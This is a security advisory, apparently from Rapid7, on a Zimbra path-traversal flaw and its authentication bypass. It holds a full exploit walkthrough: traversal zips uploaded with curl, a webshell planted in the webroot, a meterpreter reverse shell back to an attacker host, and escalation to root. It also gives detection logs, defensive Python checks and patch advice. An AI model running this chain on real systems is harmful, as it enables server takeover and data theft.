Attacker Value: Very High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: None
Privileges Required: High
Attack Vector: Network

CVE-2022-27925

Disclosure Date: April 21, 2022
Exploited in the Wild

Description

Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.

Technical Analysis

This is really bad – remote root on an organization’s email server, if combined with other (currently 0-day) vulnerabilities. Patch ASAP!

CVSS V3 Severity and Metrics
Base Score: 7.2 High
Impact Score: 5.9
Exploitability Score: 1.2
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): High
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • zimbra

Products

  • collaboration 8.8.15
  • collaboration 9.0.0

Technical Analysis

Description

In late March 2022, Zimbra released versions 9.0.0 patch 24 and 8.8.15 patch 31 to address multiple vulnerabilities in Zimbra Collaboration Suite, including CVE-2022-27924 (which we wrote about previously) and CVE-2022-27925.

Originally, Zimbra called CVE-2022-27925 an authenticated path-traversal attack, where an administrative user could write files into any directory on the filesystem as the Zimbra account. Because it was originally thought to be an administrator-only attack, NVD assigned it a CVSS base score of 7.8. Later, Volexity noticed that attackers exploiting this vulnerability had found a way to bypass the administrative requirements, and wrote about it on August 10, 2022. This new authentication bypass got a new identifier – CVE-2022-37042.

By combining the original path-traversal vulnerability and new authentication bypass, attackers can remotely compromise a Zimbra Collaboration Suite system via the administrator port (by default, 7071) anonymously. Combined with a currently unpatched privilege escalation vulnerability that we recently wrote about and wrote an exploit for, these three vulnerabilities lead to remote command execution as the root user on unpatched systems.

Although the public advisories don’t mention it, according to our analysis, Zimbra Collaboration Suite Network Edition (the paid edition) is vulnerable, and the Open Source Edition (free) is not (since it does not have the vulnerable mboximport endpoint). Vulnerable versions are:

  • Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
  • Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)

These vulnerabilities (and others in Zimbra) are being targeted for widespread exploitation in the wild, and should therefore be patched or taken offline as soon as possible. If you suspect you’ve been compromised, Zimbra provides steps to rebuild your Zimbra Collaboration Suite server from scratch on the latest patch without losing data.

Technical analysis

The core issue in CVE-2022-27925 is that the /service/extension/backup/mboximport endpoint on Zimbra Collaboration Suite’s administrative port (7071 by default), which is designed to accept a .zip file import, does not validate paths and is therefore vulnerable to a path-traversal attack. A .zip file with a relative path can write anywhere on the file system. To demonstrate, we created a .zip file with a long path, then replaced that path with path traversal:

$ echo 'Hello, world!' > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
$ zip test.zip aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  adding: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (stored 0%)
$ sed -i 's|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa|../../../../../../../../../../../tmp/test.txt|' test.zip

Then we upload it to the Zimbra server using cURL, passing a valid token (which, as we’ll see, is actually not required):

$ curl -X POST -k 'https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1' -b 'ZM_AUTH_TOKEN=0_530[...]b' --data-binary @test.zip
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 400 Error importing mailbox for account admin on server 10.0.0.166: unable to read metadata for account f4ddb29a-340f-4373-8171-c18b64c4b485</title>
</head>
[...]

We can verify it’s written to the server:

root@zimbra6:~# ls -l /tmp/test.txt
-rw-r----- 1 zimbra zimbra 14 Aug 18 22:18 /tmp/test.txt
root@zimbra6:~# cat /tmp/test.txt
Hello, world!
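
The path check that the import is missing, as an added example (not Zimbra's or Rapid7's code): it resolves each archive entry against the extraction root and reports any entry that would land outside it. The function names, the `DEST_ROOT` staging path with its `ACCOUNT-ID` placeholder, and the in-memory test archive are assumptions made for this example.

```python
import io
import posixpath
import zipfile

def escapes_root(entry_name, dest_root):
    """True if extracting entry_name beneath dest_root would land outside it."""
    name = entry_name.replace("\\", "/")  # treat backslashes as separators too
    if name.startswith("/") or name[1:2] == ":":
        return True  # absolute path or drive-letter prefix
    root = posixpath.normpath(dest_root)
    target = posixpath.normpath(posixpath.join(root, name))
    # After ".." is resolved, the target must still sit under the root.
    return posixpath.commonpath([root, target]) != root

def audit_archive(zip_bytes, dest_root):
    """Return the entry names in the archive that must be rejected."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [i.filename for i in zf.infolist()
                if escapes_root(i.filename, dest_root)]

def build_sample():
    """Constructed test archive: one ordinary entry and one entry using
    the same relative path as the demonstration above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("meta.xml", "<constructed/>")
        zf.writestr("../../../../../../../../../../../tmp/test.txt",
                    "Hello, world!\n")
    return buf.getvalue()

# Assumed staging directory for this example; ACCOUNT-ID is a placeholder.
DEST_ROOT = "/opt/zimbra/backup/tmp/mboxmove/ACCOUNT-ID"

if __name__ == "__main__":
    print(audit_archive(build_sample(), DEST_ROOT))
```

An importer that runs this check before writing anything can refuse the whole archive when the returned list is non-empty, rather than skipping individual entries.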

The more recent authentication-bypass vulnerability – CVE-2022-37042 – was simply that the authentication cookie is not actually necessary:

$ echo 'Hello, world!' > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
$ zip test2.zip aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  adding: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (stored 0%)
$ sed -i 's|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa|../../../../../../../../../../../tmp/test2.txt|' test2.zip
$ curl -X POST -k 'https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1' --data-binary @test2.zip
$ ssh root@10.0.0.166 cat /tmp/test2.txt
Hello, world!

We can also create a JSP payload using msfvenom, then upload it to the public webroot:

$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 RHOST=10.0.0.166 -f jsp -o aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of jsp file: 1919 bytes
Saved as: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

$ zip test3.zip aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
  adding: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (deflated 59%)

$ sed -i 's|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa|../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp|' test3.zip 

$ curl -X POST -k 'https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1' --data-binary @test3.zip
<html>
[...]

Then set up a Metasploit listener:

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444

Trigger the payload:

curl -k 'https://10.0.0.166/public/backdoor.jsp'

And get the shell:

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Sending stage (3020772 bytes) to 10.0.0.166
[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:54702) at 2022-08-18 15:32:50 -0700

meterpreter > getuid
Server username: zimbra

And, for bonus points, use an 0-day to get root:

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target appears to be vulnerable.
[*] Creating exploit directory: /tmp/.pz8ORN
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.pz8ORN/.w7ryDXBV
[*] Sending stage (3020772 bytes) to 10.0.0.166
[+] Deleted /tmp/.pz8ORN
[*] Meterpreter session 2 opened (10.0.0.146:4444 -> 10.0.0.166:34904) at 2022-08-18 15:34:49 -0700


meterpreter > getuid
Server username: root

IOCs

This vulnerability lets us overwrite an arbitrary file, so an attacker can exploit this in a variety of ways depending on their goal. The most obvious exploit route, however, is the one we demonstrated – writing a webshell to the public directory (either zimbra/ or zimbraAdmin/). Any unusual files in those folders should be suspect.

The file /opt/zimbra/log/mailbox.log logs any bad .zip file it receives with entries such as:

2022-08-18 22:27:57,060 ERROR [qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1] [] mboxmove - Auth failed
2022-08-18 22:27:57,061 INFO  [qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1] [] mboxmove - Importing mailbox for account admin overwrite=true
2022-08-18 22:27:57,062 INFO  [qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1] [] mboxmove - Importing data for admin into mailbox id 1.
2022-08-18 22:27:57,062 WARN  [qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1] [] mboxmove - IO error
java.io.IOException: unable to read metadata for account f4ddb29a-340f-4373-8171-c18b64c4b485
	at com.zimbra.cs.backup.util.Utils.IOException(Utils.java:72)
	at com.zimbra.cs.backup.ZipBackupTarget$RestoreAcctSession.<init>(ZipBackupTarget.java:418)
	at com.zimbra.cs.backup.ZipBackupTarget.getAccountSession(ZipBackupTarget.java:142)

[...]

Caused by: com.zimbra.common.service.ServiceException: system failure: Unable to parse XML file /opt/zimbra/backup/tmp/mboxmove/f4ddb29a-340f-4373-8171-c18b64c4b485/meta.xml
ExceptionId:qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1:1660861677062:468a5dc6ec65dbfe
Code:service.FAILURE
	at com.zimbra.common.service.ServiceException.FAILURE(ServiceException.java:288)
	at com.zimbra.cs.backup.XmlMeta.readAccountBackup(XmlMeta.java:409)
	at com.zimbra.cs.backup.ZipBackupTarget$RestoreAcctSession.<init>(ZipBackupTarget.java:414)

Any of these errors indicates an attempted attack, as does any access to the /service/extension/backup/mboximport endpoint, which is not typically used:

# cat /opt/zimbra/log/access_log.2022-08-18
10.0.0.146 - - [18/Aug/2022:22:17:03 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&append=1 HTTP/1.1" 400 387 "-" "curl/7.82.0" 2
10.0.0.146 - - [18/Aug/2022:22:17:09 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1 HTTP/1.1" 400 521 "-" "curl/7.82.0" 2
10.0.0.146 - - [18/Aug/2022:22:18:11 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1 HTTP/1.1" 400 521 "-" "curl/7.82.0" 2
10.0.0.146 - - [18/Aug/2022:22:25:32 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1 HTTP/1.1" 401 287 "-" "curl/7.82.0" 12
10.0.0.146 - - [18/Aug/2022:22:27:57 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1 HTTP/1.1" 401 287 "-" "curl/7.82.0" 12

Note that because this chain of exploits gains root access, attackers can tamper with logfiles at will.
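
One way to hunt for both indicators, as an added example (not Rapid7's or Zimbra's tooling): it lists every request to the endpoint in access_log lines and flags mailbox.log threads where "Importing mailbox" follows "Auth failed", the sequence visible in the excerpt above. The function names, the regular expressions (written against the line formats shown above) and the 2-second correlation window are assumptions.

```python
import re
from datetime import datetime, timedelta

ENDPOINT = "/service/extension/backup/mboximport"
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
MBOX_RE = re.compile(r'^(\S+ \S+) \w+\s+\[([^:\]]+):[^\]]*\] \[[^\]]*\] mboxmove - (.*)$')

def mboximport_requests(access_lines):
    """Return (client, time, method, status) for every request to the endpoint."""
    hits = []
    for line in access_lines:
        m = ACCESS_RE.match(line)
        # No status filter: in the walkthrough above the file was written
        # even though the server answered with an error page.
        if m and m.group(4).split("?", 1)[0].endswith(ENDPOINT):
            hits.append((m.group(1), m.group(2), m.group(3), int(m.group(5))))
    return hits

def imports_after_auth_failure(mailbox_lines, window=timedelta(seconds=2)):
    """Return (timestamp, thread) where 'Importing mailbox' follows 'Auth failed'
    on the same Jetty thread within `window` (an assumed threshold)."""
    last_failure, findings = {}, []
    for line in mailbox_lines:
        m = MBOX_RE.match(line)
        if not m:
            continue  # stack traces and entries from other components
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S,%f")
        thread, msg = m.group(2), m.group(3)
        if msg.startswith("Auth failed"):
            last_failure[thread] = ts
        elif msg.startswith("Importing mailbox"):
            failed_at = last_failure.pop(thread, None)
            if failed_at is not None and ts - failed_at <= window:
                findings.append((m.group(1), thread))
    return findings

# Sample lines copied from the log excerpts above.
URL = "https://10.0.0.166:7071" + ENDPOINT + "?account-name=admin&ow=1&no-switch=1&append=1"
ACCESS_SAMPLE = [
    '10.0.0.146 - - [18/Aug/2022:22:18:11 +0000] "POST %s HTTP/1.1" 400 521 "-" "curl/7.82.0" 2' % URL,
    '10.0.0.146 - - [18/Aug/2022:22:27:57 +0000] "POST %s HTTP/1.1" 401 287 "-" "curl/7.82.0" 12' % URL,
]
MAILBOX_SAMPLE = [
    "2022-08-18 22:27:57,060 ERROR [qtp678433396-593:https:%s] [] mboxmove - Auth failed" % URL,
    "2022-08-18 22:27:57,061 INFO  [qtp678433396-593:https:%s] [] mboxmove - Importing mailbox for account admin overwrite=true" % URL,
    "\tat com.zimbra.cs.backup.util.Utils.IOException(Utils.java:72)",
]

if __name__ == "__main__":
    print(mboximport_requests(ACCESS_SAMPLE))
    print(imports_after_auth_failure(MAILBOX_SAMPLE))
```

Run it against copies of the logs shipped off the host, since logs left on a compromised server cannot be trusted.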

Guidance

Because this is being actively exploited, Rapid7 strongly encourages all Zimbra Collaboration Suite users to either update their Zimbra installations, or to temporarily take them offline until they can be updated. If you suspect you’ve been compromised, you should rebuild your Zimbra server instead of trying to recover.
